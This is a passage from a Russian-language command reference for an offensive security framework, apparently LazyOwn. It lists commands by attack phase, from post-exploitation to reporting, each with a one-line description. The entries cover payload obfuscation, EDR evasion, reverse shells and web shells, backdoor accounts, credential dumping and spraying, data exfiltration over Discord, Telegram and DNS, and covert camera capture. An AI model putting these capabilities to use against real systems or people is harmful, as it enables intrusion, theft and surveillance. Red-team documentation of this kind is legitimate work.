Преобразует файл .exe в donut-бинарный файл.

extract_yaml

Фаза: постэксплуатация | Источник: cli/commands/postexp_migrated.py

Извлекает YAML из существующего отладочного файла и пытается создать playbook.

find

Фаза: постэксплуатация | Источник: cli/commands/postexp_migrated.py

Автоматизирует выполнение команд на основе списка алиасов и команд.

follina

Фаза: постэксплуатация | Источник: cli/commands/postexp.py

Запускает настройку эксплойта Follina (CVE-2022-30190).

hex2shellcode

Фаза: постэксплуатация | Источник: cli/commands/postexp_migrated.py

Преобразует сырой hex-payload из msfvenom в совместимый с NASM формат shellcode.

internet_proxy

Фаза: постэксплуатация | Источник: cli/commands/postexp_migrated.py

Настраивает локальную машину с доступом в интернет для работы в качестве прокси для машины без доступа в интернет.

issue_command_to_c2

Фаза: постэксплуатация | Источник: cli/commands/postexp_migrated.py

Выполняет команду на клиенте через C2. download: команда, вы должны поместить файл в sessions/temp_upload или использовать команду download_c2.

lazywebshell

Фаза: постэксплуатация | Источник: cli/commands/postexp.py

Запускает веб-шелл сервер LazyOwn на порту 8888.

mimikatzpy

Фаза: постэксплуатация | Источник: cli/commands/postexp.py

Запускает Mimikatz через Python (в стиле impacket).

ofuscate_payload

Фаза: постэксплуатация | Источник: cli/commands/postexp_migrated.py

Обфусцирует shell-скрипт, кодируя его в Base64, и подготавливает команду для декодирования и выполнения.

ofuscate_string

Фаза: постэксплуатация | Источник: cli/commands/postexp_migrated.py

Обфусцирует строку в код Go.

ofuscatesh

Фаза: постэксплуатация | Источник: cli/commands/postexp_migrated.py

Обфусцирует shell-скрипт, кодируя его в Base64, и подготавливает команду для декодирования и выполнения.

ofuscatorps1

Фаза: постэксплуатация | Источник: cli/commands/postexp.py

Обфусцирует PowerShell-скрипт.

path2hex

Фаза: постэксплуатация | Источник: cli/commands/postexp_migrated.py

Преобразует путь к бинарному файлу в hex-код little-endian x64 для внедрения shellcode.

pezorsh

Фаза: постэксплуатация | Источник: cli/commands/postexp_migrated.py

Выполняет инструмент PEzor для упаковки исполняемых файлов или shellcode с пользовательскими конфигурациями.

pip_proxy

Phase: postexp | Source: cli/commands/postexp_migrated.py

Настраивает локальную машину с доступом в интернет для работы в качестве pip-прокси для машины без доступа в интернет.

pip_repo

Phase: postexp | Source: cli/commands/postexp_migrated.py

Настраивает локальный репозиторий pip для предоставления Python-пакетов для установки на скомпрометированной машине без доступа в интернет.

powershell_cmd_stager

Phase: postexp | Source: cli/commands/postexp_migrated.py

Генерирует и выполняет командный stager PowerShell для запуска скрипта .ps1.

rmfromfind

Phase: postexp | Source: cli/commands/postexp_migrated.py

Удаляет пользовательскую команду по индексу (как показано в 'find').

rubeus

Phase: postexp | Source: cli/commands/postexp_migrated.py

Копирует команду в буфер обмена для загрузки и запуска Rubeus.

scavenger

Phase: postexp | Source: cli/commands/postexp.py

Запускает сборщик данных пост-эксплуатации Scavenger.

scp

Phase: postexp | Source: cli/commands/postexp_migrated.py

Копирует локальный каталог "sessions" на удаленный хост с помощью scp, используя sshpass для автоматической аутентификации.

service_ssh

Phase: postexp | Source: cli/commands/postexp_migrated.py

Создает файл службы systemd для указанного бинарного файла и генерирует скрипт для включения и запуска службы.

sessionsshstrace

Phase: postexp | Source: cli/commands/postexp_migrated.py

Подключает strace к работающему процессу и записывает вывод в файл.

shellcode

Phase: postexp | Source: cli/commands/postexp.py

Генерирует и управляет shellcode.

shellcode2elf

Phase: postexp | Source: cli/commands/postexp_migrated.py

Преобразует shellcode в ELF-файл и заражает его.

shellcode2sylk

Phase: postexp | Source: cli/commands/postexp_migrated.py

Преобразует shellcode в формат SYLK и сохраняет результат в файл.

shellcode_search

Phase: postexp | Source: cli/commands/postexp_migrated.py

Ищет shellcode в API shell-storm по предоставленным ключевым словам.

ssh_cmd

Phase: postexp | Source: cli/commands/postexp_migrated.py

Выполняет удаленную команду через SSH с использованием настроенного start_user. См. help grisun0 для настройки пользователя-бэкдора.

yara_scan

Phase: postexp | Source: cli/commands/postexp_migrated.py

Сканирует файлы или каталоги с помощью правил YARA на наличие вредоносных программ / IOC.

05. Персистентность

asprevbase64

Phase: persist | Source: cli/commands/persist_migrated.py

Создает полезную нагрузку ASP reverse shell в кодировке base64 и копирует её в буфер обмена.

backdoor_factory

Phase: persist | Source: cli/commands/persist_migrated.py

Создает исполняемый файл с бэкдором с помощью backdoor-factory.

beaconcfg

Phase: persist | Source: cli/commands/persist_migrated.py

Генерирует профиль C2 beacon с морфингом трафика и доменным фронтом.

conptyshell

Phase: persist | Source: cli/commands/persist.py

Загружает ConPtyShell и подготавливает команду запуска PowerShell.

createrevshell

Phase: persist | Source: cli/commands/persist.py

Создает bash-скрипт reverse shell в sessions/.

createwebshell

Phase: persist | Source: cli/commands/persist.py

Создает веб-шеллы (PHP под видом JPG, p0wny-shell, ASP).

createwinrevshell

Phase: persist | Source: cli/commands/persist.py

Создает Windows reverse shell (PowerShell).

darkarmour

Phase: persist | Source: cli/commands/persist_migrated.py

Использует инструмент darkarmour для создания необнаруживаемой версии PE-исполняемого файла.

dr0p1t

Phase: persist | Source: cli/commands/persist_migrated.py

Выполняет инструмент Dr0p1t для создания скрытого дроппера вредоносных программ.

ftp

Phase: persist | Source: cli/commands/persist_migrated.py

Подключается к FTP-хосту, используя учетные данные из файла и указанный порт.

generate_revshell

Phase: persist | Source: cli/commands/persist_migrated.py

Генерирует reverse shell на различных языках программирования.

grisun0

Phase: persist | Source: cli/commands/persist_migrated.py

Создает и копирует команду shell для добавления нового пользователя, назначения пароля, добавления пользователя в группу sudo и переключения на этого пользователя.

grisun0w

Phase: persist | Source: cli/commands/persist_migrated.py Создает и копирует команду PowerShell для добавления нового пользователя, назначения пароля, добавления пользователя в группу администраторов и переключения на этого пользователя.

ivy

Фаза: постоянство | Источник: cli/commands/persist_migrated.py

Генерирует полезные нагрузки с помощью Ivy с различными опциями. Ivy — это фреймворк для создания полезных нагрузок для выполнения произвольного исходного кода VBA (макросов) непосредственно в памяти. Загрузчик Ivy делает это, используя программный доступ к объектной среде VBA для загрузки, расшифровки и выполнения шеллкода.

knokknok

Фаза: постоянство | Источник: cli/commands/persist_migrated.py

Отправляет специальную строку для запуска обратной оболочки с командой 'c2 client_name'.

listener_go

Фаза: постоянство | Источник: cli/commands/persist_migrated.py

Настраивает и запускает слушатель для указанной жертвы.

listener_py

Фаза: постоянство | Источник: cli/commands/persist_migrated.py

Настраивает и запускает слушатель для указанной жертвы.

msfpc

Фаза: постоянство | Источник: cli/commands/persist_migrated.py

Генерирует полезные нагрузки с помощью MSFvenom Payload Creator (MSFPC).

paranoid_meterpreter

Фаза: постоянство | Источник: cli/commands/persist_migrated.py

Создает и развертывает параноидальную полезную нагрузку Meterpreter и слушатель с привязкой SSL/TLS и отслеживанием UUID.

pwncat

Фаза: постоянство | Источник: cli/commands/persist_migrated.py

Запускает pwncat с указанным портом для прослушивания. SELFINJECT

pwncatcs

Фаза: постоянство | Источник: cli/commands/persist.py

Запускает слушатель обратной оболочки pwncat-cs.

rdp

Фаза: постоянство | Источник: cli/commands/persist_migrated.py

Читает учетные данные из файла, шифрует пароль и выполняет команду подключения RDP.

revwin

Фаза: постоянство | Источник: cli/commands/persist.py

Создает исполняемый файл обратной оболочки Windows.

scarecrow

Фаза: постоянство | Источник: cli/commands/persist_migrated.py

Выполняет ScareCrow с различными опциями для обхода решений EDR и выполнения шеллкода.

service

Фаза: постоянство | Источник: cli/commands/persist_migrated.py

Создает файл службы systemd для указанного бинарного файла и генерирует скрипт для включения и запуска службы.

setoolKits

Фаза: постоянство | Источник: cli/commands/persist_migrated.py

Выполняет рабочий процесс SEToolKit для генерации полезной нагрузки Meterpreter.

toctoc

Фаза: постоянство | Источник: cli/commands/persist_migrated.py

Отправляет магический пакет китайскому вредоносному ПО.

veil

Фаза: постоянство | Источник: cli/commands/persist_migrated.py

Генерирует полезные нагрузки с помощью Veil-Evasion с различными опциями. Veil-Evasion — это фреймворк для создания полезных нагрузок.

weevely

Фаза: постоянство | Источник: cli/commands/persist_migrated.py

Подключается к PHP-бэкдору с помощью Weevely, защищенному указанным паролем.

weevelygen

Фаза: постоянство | Источник: cli/commands/persist_migrated.py

Генерирует PHP-бэкдор с помощью Weevely, защищенный указанным паролем.

wmi_lateral

Фаза: постоянство | Источник: cli/commands/persist.py

Выполняет команду на удаленном хосте через WMI.

wmi_persist

Фаза: постоянство | Источник: cli/commands/persist.py

Создает постоянство с помощью подписки на события WMI (безфайловое, без записи на диск).

wmi_scheduled_task

Фаза: постоянство | Источник: cli/commands/persist.py

Создает запланированную задачу для постоянства через WMI.

06. Повышение привилегий

crystal_ball

Фаза: повышение привилегий | Источник: cli/commands/crystal_ball.py

Анализирует вывод linpeas/winpeas и ранжирует векторы повышения привилегий с точными командами.

gtfo

Фаза: повышение привилегий | Источник: cli/commands/privilege_escalation.py

Ищет бинарный файл в базах знаний GTFOBins и LOLBas parquet.

juicypotato

Фаза: повышение привилегий | Источник: cli/commands/privilege_escalation.py

Раздает JuicyPotato через HTTP для повышения привилегий Windows.

les

Фаза: повышение привилегий | Источник: cli/commands/privilege_escalation.py

Запускает Linux Exploit Suggester для версии ядра.

linpeas

Фаза: повышение привилегий | Источник: cli/commands/privilege_escalation.py

Раздает linpeas.sh через HTTP и выводит целевую однострочную команду.

printspoofer

Фаза: повышение привилегий | Источник: cli/commands/privilege_escalation.py

Раздает PrintSpoofer через HTTP для повышения привилегий Windows.

privesc_cmd_by_os

Фаза: повышение привилегий | Источник: cli/commands/privilege_escalation.py Подготовьте и отправьте команду linpeas/winpeas C2-клиенту.

privesc_suggest

Фаза: повышение привилегий | Источник: cli/commands/crystal_ball.py

Быстрый алиас для crystal_ball --auto.

pspy

Фаза: повышение привилегий | Источник: cli/commands/privilege_escalation.py

Раздайте процесс-монитор pspy через HTTP.

responder

Фаза: повышение привилегий | Источник: cli/commands/privilege_escalation.py

Запустите Responder на настроенном device с повышенными привилегиями.

smbserver

Фаза: повышение привилегий | Источник: cli/commands/privilege_escalation.py

Поднимите Impacket SMB-сервер с тремя вариантами ретрансляции.

sudo

Фаза: повышение привилегий | Источник: cli/commands/privilege_escalation.py

Перезапустите фреймворк с root-привилегиями, если они отсутствуют.

sudo_privesc

Фаза: повышение привилегий | Источник: cli/commands/privilege_escalation.py

Проанализируйте вывод sudo -l и сверьте с GTFOBins.

suid_check

Фаза: повышение привилегий | Источник: cli/commands/privilege_escalation.py

Выведите команды перечисления SUID/SGID, готовые для вставки на целевой системе.

whoami_priv

Фаза: повышение привилегий | Источник: cli/commands/privilege_escalation.py

Выведите команды перечисления привилегий для целевой ОС.

winpeas

Фаза: повышение привилегий | Источник: cli/commands/privilege_escalation.py

Раздайте вариант winPEAS через HTTP и выведите однострочную команду для цели.

07. Доступ к учетным данным

addusers

Фаза: учетные данные | Источник: cli/commands/cred_migrated.py

Открывает или создает файл users.txt в каталоге sessions для редактирования с помощью nano.

adsso_spray

Фаза: учетные данные | Источник: cli/commands/cred_migrated.py

Выполняет атаку перебором паролей (password spray) на Azure Active Directory Seamless Single Sign-On (SSO), используя указанный список пользователей.

cewl

Фаза: учетные данные | Источник: cli/commands/cred.py

Сгенерируйте словарь из веб-сайта с помощью cewl.

crack_cisco_7_password

Фаза: учетные данные | Источник: cli/commands/cred_migrated.py

Взломайте хэш пароля Cisco Type 7 и отобразите открытый текст.

createcredentials

Фаза: учетные данные | Источник: cli/commands/cred_migrated.py

Создает файл credentials.txt в каталоге sessions с указанными именем пользователя и паролем.

createhash

Фаза: учетные данные | Источник: cli/commands/cred_migrated.py

Создает файл hash.txt в каталоге sessions с указанным значением хэша и анализирует его с помощью Name-the-hash.

createmail

Фаза: учетные данные | Источник: cli/commands/cred_migrated.py

Сгенерируйте перестановки email на основе полного имени и self.params['domain'], затем сохраните их в файл.

createusers_and_hashs

Фаза: учетные данные | Источник: cli/commands/cred_migrated.py

Команда createusers_and_hashs: извлекает имена пользователей и хэши из файла дампа.

cred

Фаза: учетные данные | Источник: cli/commands/cred_migrated.py

Отобразите учетные данные, хранящиеся в файле credentials.txt, и скопируйте пароль в буфер обмена.

creds_py

Фаза: учетные данные | Источник: cli/commands/cred.py

Извлеките учетные данные из файла или вывода команды.

crunch

Фаза: учетные данные | Источник: cli/commands/cred.py

Сгенерируйте словари с помощью crunch.

cubespraying

Фаза: учетные данные | Источник: cli/commands/cred_migrated.py

Команда cubespraying: автоматизирует установку и использование CubeSpraying для выполнения атак распыления учетных данных.

dacledit

Фаза: учетные данные | Источник: cli/commands/cred_migrated.py

Выполните команду dacledit.py для конкретного пользователя или всех пользователей, перечисленных в файле users.txt.

generatedic

Фаза: учетные данные | Источник: cli/commands/cred_migrated.py

Генерирует словарь на основе целевого имени и списка символов с различными комбинациями.

hashcat

Фаза: учетные данные | Источник: cli/commands/cred.py

Запустите взлом паролей с помощью hashcat.

hydra

Фаза: учетные данные | Источник: cli/commands/cred.py

Запустите Hydra для онлайн-атак на пароли.

john2hash

Фаза: учетные данные | Источник: cli/commands/cred.py

Преобразуйте хэш в формат John the Ripper.

john2keepas

Фаза: учетные данные | Источник: cli/commands/cred_migrated.py

Перечислите все файлы .kdbx в каталоге 'sessions', дайте пользователю выбрать один и запустите

john2zip

Фаза: учетные данные | Источник: cli/commands/cred_migrated.py

Перечислите все файлы .zip в каталоге 'sessions', дайте пользователю выбрать один и запустите команду

keepass

Phase: учетные данные | Source: cli/commands/cred_migrated.py

Открывает файл .kdbx и выводит заголовки и содержимое всех записей. Пароль можно указать через

medusa

Phase: учетные данные | Source: cli/commands/cred.py

Запуск Medusa для онлайн-атак на пароли.

passtightvnc

Phase: учетные данные | Source: cli/commands/cred_migrated.py

Расшифровывает пароли TightVNC с помощью Metasploit.

passwordspray

Phase: учетные данные | Source: cli/commands/cred_migrated.py

Выполняет распыление паролей с помощью crackmapexec с указанными параметрами.

refill_password

Phase: учетные данные | Source: cli/commands/cred_migrated.py

Генерирует список возможных паролей, заменяя каждую звёздочку во входных данных на указанные пользователем символы.

rocky

Phase: учетные данные | Source: cli/commands/cred_migrated.py

Сокращает словарь на основе заданной длины пароля.

searchhash

Phase: учетные данные | Source: cli/commands/cred_migrated.py

Помогает найти типы хэшей в Hashcat, просматривая его справочный вывод.

smalldic

Phase: учетные данные | Source: cli/commands/cred_migrated.py

Обрабатывает создание временных файлов для пользователей и паролей на основе небольшого словаря.

spraykatz

Phase: учетные данные | Source: cli/commands/cred.py

Запуск SprayKatz для распыления учётных данных.

sshkey

Phase: учетные данные | Source: cli/commands/cred.py

Генерирует пару SSH-ключей.

transform

Phase: учетные данные | Source: cli/commands/cred_migrated.py

Преобразует входную строку в соответствии с заданным пользователем стилем регистра.

username_anarchy

Phase: учетные данные | Source: cli/commands/cred_migrated.py

Генерирует имена пользователей с помощью инструмента username-anarchy на основе пользовательского ввода.

08. Латеральное перемещение

addcli

Phase: латеральное перемещение | Source: cli/commands/lateral_migrated.py

Добавляет клиента для выполнения команд C2.

bitm

Phase: латеральное перемещение | Source: cli/commands/bitm.py

Менеджер атак "браузер посередине" (Browser-in-the-Middle).

bloodyAD

Phase: латеральное перемещение | Source: cli/commands/lateral_migrated.py

Выполняет команду bloodyAD.py для конкретного пользователя или для всех пользователей из файла users.txt.

chisel

Phase: латеральное перемещение | Source: cli/commands/lateral.py

Запуск chisel для быстрого туннелирования.

dcomexec

Phase: латеральное перемещение | Source: cli/commands/lateral_migrated.py

Выполняет инструмент Impacket dcomexec для запуска команд на удалённой системе с помощью DCOM.

dominion

Phase: латеральное перемещение | Source: cli/commands/lateral_migrated.py

Выполняет полностью автоматический захват домена Active Directory.

getTGT

Phase: латеральное перемещение | Source: cli/commands/lateral_migrated.py

Запрашивает билет Ticket Granting Ticket (TGT) с помощью инструмента Impacket с предоставленными учётными данными.

gospherus

Phase: латеральное перемещение | Source: cli/commands/lateral_migrated.py

Команда gospherus: клонирует и использует инструмент Gopherus для генерации полезных нагрузок gopher для различных сервисов.

id_rsa

Phase: латеральное перемещение | Source: cli/commands/lateral_migrated.py

Создаёт файл закрытого SSH-ключа и подключается к удалённому хосту по SSH.

lateral_mov_lin

Phase: латеральное перемещение | Source: cli/commands/lateral_migrated.py

Выполняет латеральное перемещение, загружая и устанавливая LazyOwn на удалённую Linux-машину.

ligolo

Phase: латеральное перемещение | Source: cli/commands/lateral.py

Запуск Ligolo-ng для продвинутого пивотинга.

mssqlcli

Phase: латеральное перемещение | Source: cli/commands/lateral_migrated.py

Пытается подключиться к серверу MSSQL с помощью инструмента mssqlclient.py с аутентификацией Windows.

nc

Phase: латеральное перемещение | Source: cli/commands/lateral.py

Прослушивание или подключение через Netcat.

ngrok

Phase: латеральное перемещение | Source: cli/commands/lateral.py

Запуск туннеля ngrok.

penelope

Phase: латеральное перемещение | Source: cli/commands/lateral_migrated.py

Команда penelope: устанавливает и запускает Penelope для обработки обратных и привязанных оболочек.

regeorg

Phase: латеральное перемещение | Source: cli/commands/lateral_migrated.py

Выполняет инструмент reGeorg для туннелирования HTTP(S) через SOCKS-прокси.

rnc

Phase: латеральное перемещение | Source: cli/commands/lateral_migrated.py

Запускает nc с rlwrap на указанном порту для прослушивания.

set_proxychains

Phase: латеральное перемещение | Source: cli/commands/lateral.py

Настраивает proxychains для текущей сессии.

shadowsocks

Phase: латеральное перемещение | Source: cli/commands/lateral_migrated.py Выполните инструмент Shadowsocks для создания защищённого туннеля для сетевого трафика.

socat

Фаза: латеральное перемещение | Источник: cli/commands/lateral.py

Запуск socat для проброса портов.

ssh

Фаза: латеральное перемещение | Источник: cli/commands/lateral.py

Подключение по SSH к удалённому хосту (нестандартный порт).

sshd

Фаза: латеральное перемещение | Источник: cli/commands/lateral_migrated.py

Запускает службу SSH и отображает её статус.

stormbreaker

Фаза: латеральное перемещение | Источник: cli/commands/lateral_migrated.py

Команда stormbreaker: автоматизирует установку и использование Storm-Breaker для выполнения различных сетевых атак.

targetedKerberoas

Фаза: латеральное перемещение | Источник: cli/commands/lateral_migrated.py

Выполняет инструмент targetedKerberoast для извлечения билетов службы Kerberos.

tord

Фаза: латеральное перемещение | Источник: cli/commands/lateral_migrated.py

Выполняет скрипт tor.sh с указанным портом или по умолчанию использует порт 80, если порт не указан.

upload_c2

Фаза: латеральное перемещение | Источник: cli/commands/lateral_migrated.py

Команда upload в клиенте с использованием C2 для загрузки файла.

vpn

Фаза: латеральное перемещение | Источник: cli/commands/lateral_migrated.py

Подключение к VPN путём выбора из доступных файлов .ovpn.

wifipass

Фаза: латеральное перемещение | Источник: cli/commands/lateral_migrated.py

Эта функция генерирует PowerShell-скрипт, который извлекает сохранённые пароли Wi-Fi в системе Windows.

wmiexec

Фаза: латеральное перемещение | Источник: cli/commands/lateral.py

Выполнение команд через WMI.

wmiexecpro

Фаза: латеральное перемещение | Источник: cli/commands/lateral_migrated.py

Выполняет wmiexec-pro с различными параметрами для операций WMI.

09. Экфильтрация данных

adgetpass

Фаза: экфильтрация | Источник: cli/commands/exfiltration.py

Генерирует PowerShell-скрипт для извлечения учётных данных Azure AD Connect.

decrypt

Фаза: экфильтрация | Источник: cli/commands/exfiltration.py

Расшифровывает файл, зашифрованный XOR, с использованием соответствующего ключа.

dns_beacon

Фаза: экфильтрация | Источник: cli/commands/dns_exfil.py

Запускает DNS-туннельный маяк.

dns_beacon_status

Фаза: экфильтрация | Источник: cli/commands/dns_exfil.py

Показывает статус всех DNS-маяков.

dns_exfil_listen

Фаза: экфильтрация | Источник: cli/commands/dns_exfil.py

Запускает DNS-слушатель для экфильтрации на UDP-порту 53.

download_c2

Фаза: экфильтрация | Источник: cli/commands/exfiltration.py

Загружает файл из C2-импланта через команду upload.

dpapi_blob

Фаза: экфильтрация | Источник: cli/commands/dpapi.py

Расшифровывает DPAPI-блоб в автономном режиме.

dpapi_harvest

Фаза: экфильтрация | Источник: cli/commands/dpapi.py

Собирает все учётные данные, защищённые DPAPI, с локальной машины.

dpapi_masterkeys

Фаза: экфильтрация | Источник: cli/commands/dpapi.py

Перечисляет и извлекает мастер-ключи DPAPI.

dploot

Фаза: экфильтрация | Источник: cli/commands/exfiltration.py

Запускает dploot для извлечения секретов, защищённых DPAPI.

encrypt

Фаза: экфильтрация | Источник: cli/commands/exfiltration.py

Шифрует файл с помощью XOR, используя ключ, предоставленный вызывающим кодом.

evidence

Фаза: экфильтрация | Источник: cli/commands/exfiltration.py

Кодирует дерево sessions/ в видеофайл или декодирует его обратно.

evilwinrm

Фаза: экфильтрация | Источник: cli/commands/exfiltration.py

Управляет Evil-WinRM через аутентификацию по паролю, хешу или только Kerberos.

exfil_auto

Фаза: экфильтрация | Источник: cli/commands/exfiltration.py

Автоматически определяет флаги и чувствительные файлы, затем выполняет экфильтрацию.

exfil_discord

Фаза: экфильтрация | Источник: cli/commands/exfiltration.py

Экфильтрует файл через вебхук Discord.

exfil_dns

Фаза: экфильтрация | Источник: cli/commands/exfiltration.py

Экфильтрует данные через DNS-туннелирование.

exfil_gcs

Фаза: экфильтрация | Источник: cli/commands/exfiltration.py

Загружает файл в Google Cloud Storage.

exfil_http

Фаза: экфильтрация | Источник: cli/commands/exfiltration.py

Экфильтрует файл через HTTP POST на контролируемый сервер.

exfil_s3

Фаза: экфильтрация | Источник: cli/commands/exfiltration.py

Загружает файл в бакет AWS S3.

exfil_start_server

Фаза: экфильтрация | Источник: cli/commands/dns_exfil.py

Запускает все необходимые слушатели для экфильтрации.

exfil_telegram

Фаза: экфильтрация | Источник: cli/commands/exfiltration.py

Экфильтрует файл через Telegram Bot API.

getadusers

Фаза: эксфильтрация | Источник: cli/commands/exfiltration.py

Запустите impacket-GetADUsers для перечисления учетных записей AD на контроллере домена.

getnthash_py

Фаза: эксфильтрация | Источник: cli/commands/exfiltration.py

Восстановите NT-хэш из Kerberos U2U TGS с помощью PKINITtools.

getuserspns

Фаза: эксфильтрация | Источник: cli/commands/exfiltration.py

Запустите impacket-GetUserSPNs для запроса сервисных билетов, пригодных для roasting.

gitdumper

Фаза: эксфильтрация | Источник: cli/commands/exfiltration.py

Установите git-dumper, если он отсутствует, и вытяните удаленное дерево .git.

gmsadumper

Фаза: эксфильтрация | Источник: cli/commands/exfiltration.py

Запустите gMSADumper для чтения blob-объектов паролей gMSA, видимых пользователю.

http_exfil_server

Фаза: эксфильтрация | Источник: cli/commands/dns_exfil.py

Запустите минимальный HTTP-приемник для эксфильтрации данных.

reg_py

Фаза: эксфильтрация | Источник: cli/commands/exfiltration.py

Запросите удаленный раздел реестра с помощью impacket-reg.py при аутентификации по хэшу.

rsync

Фаза: эксфильтрация | Источник: cli/commands/exfiltration.py

Отправьте дерево sessions/ на rhost по SCP с использованием sshpass.

samdump2

Фаза: эксфильтрация | Источник: cli/commands/exfiltration.py

Запустите samdump2 для файлов sessions/SYSTEM и sessions/SAM.

secretsdump

Фаза: эксфильтрация | Источник: cli/commands/exfiltration.py

Запустите impacket-secretsdump для извлечения SAM, учетных данных или NTDS.

smb_exfil

Фаза: эксфильтрация | Источник: cli/commands/dns_exfil.py

Эксфильтрируйте файлы в SMB-ресурс на машине атакующего.

stage

Фаза: эксфильтрация | Источник: cli/commands/exfiltration.py

Подготовьте данные для эксфильтрации: сжатие, шифрование и разделение.

unzip

Фаза: эксфильтрация | Источник: cli/commands/exfiltration.py

Извлеките zip-архив, расположенный в sessions/.

upload_gofile

Фаза: эксфильтрация | Источник: cli/commands/exfiltration.py

Загрузите файл из sessions/ на Gofile через его HTTP API.

10. Командование и управление

apt_playbook

Фаза: C2 | Источник: cli/commands/command_and_control_migrated.py

Вывод списка, проверка и запуск плейбуков APT на основе публичных отчетов об угрозах.

atomic_agent

Фаза: C2 | Источник: cli/commands/command_and_control_migrated.py

Генерация и синхронизация скриптов атомарных агентов.

atomic_gen

Фаза: C2 | Источник: cli/commands/command_and_control_migrated.py

Генерация тестовых и очищающих скриптов для заданного идентификатора техники Atomic Red Team.

atomic_tests

Фаза: C2 | Источник: cli/commands/command_and_control_migrated.py

Выполнение тестов Atomic Red Team на основе выбранной пользователем платформы и теста.

attack_plan

Фаза: C2 | Источник: cli/commands/command_and_control_migrated.py

Выполнение многошагового плана симуляции APT на основе идентификаторов тестов Atomic Red Team.

automsf

Фаза: C2 | Источник: cli/commands/command_and_control_migrated.py

Попытка проверить уязвимость с помощью модуля, переданного в качестве аргумента lazyown, например automsf exploit/windows/iis/iis_webdav_upload_asp, для использования в Metasploit.

c2

Фаза: C2 | Источник: cli/commands/command_and_control_migrated.py

Управление настройкой C2-сервера и компиляцией агента.

c2_beacon_cmd

Фаза: C2 | Источник: cli/commands/command_and_control.py

Постановка команды в очередь для выполнения на подключенном beacon.

c2_beacons

Фаза: C2 | Источник: cli/commands/command_and_control.py

Список всех активных сессий beacon с их временными метками последнего появления.

c2_implant

Фаза: C2 | Источник: cli/commands/command_and_control.py

Генерация скомпилированного импланта для целевой платформы.

c2_keygen

Фаза: C2 | Источник: cli/commands/command_and_control.py

Генерация нового ключа AES-256 для шифрования beacon.

c2_quickstart

Фаза: C2 | Источник: cli/commands/command_and_control.py

Быстрая настройка C2: генерация ключа, подготовка каталога импланта, вывод команд beacon.

c2_status

Фаза: C2 | Источник: cli/commands/command_and_control.py

Показать сводный статус C2: слушатели, beacon, импланты и сессии.

caldera

Фаза: C2 | Источник: cli/commands/command_and_control_migrated.py

Установка и запуск сервера Caldera.

caldera_export

Фаза: C2 | Источник: cli/commands/command_and_control_migrated.py

Экспорт плейбука LazyOwn в YAML-файл способности CALDERA.

caldera_import

Фаза: C2 | Источник: cli/commands/command_and_control_migrated.py

Импорт способностей CALDERA в LazyOwn. Импортируйте возможности CALDERA в плейбуки LazyOwn.

duckyspark

Фаза: c2 | Источник: cli/commands/command_and_control_migrated.py

duckyspark Компилирует и загружает скетч .ino на устройство Digispark с помощью Arduino CLI и Micronucleus.

emp3r0r

Фаза: c2 | Источник: cli/commands/command_and_control_migrated.py

Команда emp3r0r загружает и настраивает сервер Emperor для локальной эксплуатации.

empire

Фаза: c2 | Источник: cli/commands/command_and_control_migrated.py

Генерирует полезные нагрузки с помощью PowerShell Empire с различными параметрами.

generate_playbook

Фаза: c2 | Источник: cli/commands/command_and_control_migrated.py

Генерирует плейбук, который интегрирует тесты Atomic Red Team и техники MITRE ATT&CK.

iis_webdav_upload_asp

Фаза: c2 | Источник: cli/commands/command_and_control_migrated.py

(CVE-2017-7269). Уязвимость с использованием модуля iis_webdav_upload_asp из Metasploit.

listener

Фаза: c2 | Источник: cli/commands/command_and_control_migrated.py

Управление C2-слушателями: список, добавление, запуск, остановка, удаление.

mitre_test

Фаза: c2 | Источник: cli/commands/command_and_control_migrated.py

Взаимодействует с фреймворком MITRE ATT&CK, используя формат STIX 2.0.

msf

Фаза: c2 | Источник: cli/commands/command_and_control_migrated.py

Автоматизирует различные задачи Metasploit, включая сканирование на уязвимости, настройку обратных оболочек и создание полезных нагрузок.

msfrpc

Фаза: c2 | Источник: cli/commands/command_and_control_migrated.py

Подключается к демону msfrpcd и позволяет удаленно управлять Metasploit.

my_playbook

Фаза: c2 | Источник: cli/commands/command_and_control_migrated.py

Генерирует плейбук из вашей пользовательской базы техник.

sandbox

Фаза: c2 | Источник: cli/commands/command_and_control_migrated.py

Переключение или запрос режима песочницы Docker.

sliver_server

Фаза: c2 | Источник: cli/commands/command_and_control_migrated.py

Запускает сервер Sliver и генерирует файл конфигурации клиента для подключения клиентов.

11. Отчетность

apropos

Фаза: report | Источник: cli/commands/report_migrated.py

Поиск команд, соответствующих заданному параметру, в интерфейсе cmd и, при необходимости, расширение поиска с помощью системной команды apropos.

banners

Фаза: report | Источник: cli/commands/report.py

Управление пользовательскими баннерами для фреймворка.

c2asm

Фаза: report | Источник: cli/commands/report_migrated.py

Отображение кода C и ASM бок о бок в интерфейсе на основе curses.

camphish

Фаза: report | Источник: cli/commands/report_migrated.py

Выполняет инструмент camphish для захвата изображений с фронтальной камеры телефона цели или веб-камеры ПК, просто отправив ссылку.

create_session_json

Фаза: report | Источник: cli/commands/report.py

Создать файл отчета сеанса в формате JSON.

createjsonmachine

Фаза: report | Источник: cli/commands/report_migrated.py

Создать новый файл полезной нагрузки JSON на основе шаблона, предоставленного в payload.json.

createjsonmachine_batch

Фаза: report | Источник: cli/commands/report_migrated.py

Создать несколько файлов полезной нагрузки JSON на основе входного CSV-файла от HackerOne.

createtargets

Фаза: report | Источник: cli/commands/report.py

Создать файл целей из сканирования nmap.

download_malwarebazar

Фаза: report | Источник: cli/commands/report_migrated.py

Скачать образец вредоносного ПО из MalwareBazaar, используя его SHA256-хеш.

extract_ports

Фаза: report | Источник: cli/commands/report_migrated.py

Извлекает информацию об открытых портах и IP-адресах из указанного файла.

eyewitness

Фаза: report | Источник: cli/commands/report.py

Запустить EyeWitness для захвата веб-снимков экрана.

eyewitness_py

Фаза: report | Источник: cli/commands/report_migrated.py

Автоматизирует установку и выполнение EyeWitness без необходимости ввода пользователя.

gen_report

Фаза: report | Источник: cli/commands/report_enhanced.py

Создание улучшенных профессиональных отчетов о тестировании на проникновение.

get_avaible_actions

Фаза: report | Источник: cli/commands/report_migrated.py

Получить список поддерживаемых действий.

gowitness

Фаза: report | Источник: cli/commands/report.py

Запустить gowitness для захвата веб-снимков экрана.

gpt

Фаза: report | Источник: cli/commands/report.py Запрос к GPT/Groq AI для анализа и формирования отчётов.

img2vid

Фаза: отчёт | Источник: cli/commands/report_migrated.py

Создаёт MP4-видео из PNG-изображений, найденных в каталоге sessions/captured_images.

lazyreport

Фаза: отчёт | Источник: cli/commands/report_migrated.py

Формирует профессиональный отчёт о результатах red team на основе данных сеанса.

malwarebazar

Фаза: отчёт | Источник: cli/commands/report.py

Поиск образцов вредоносного ПО в Malware Bazaar.

morse

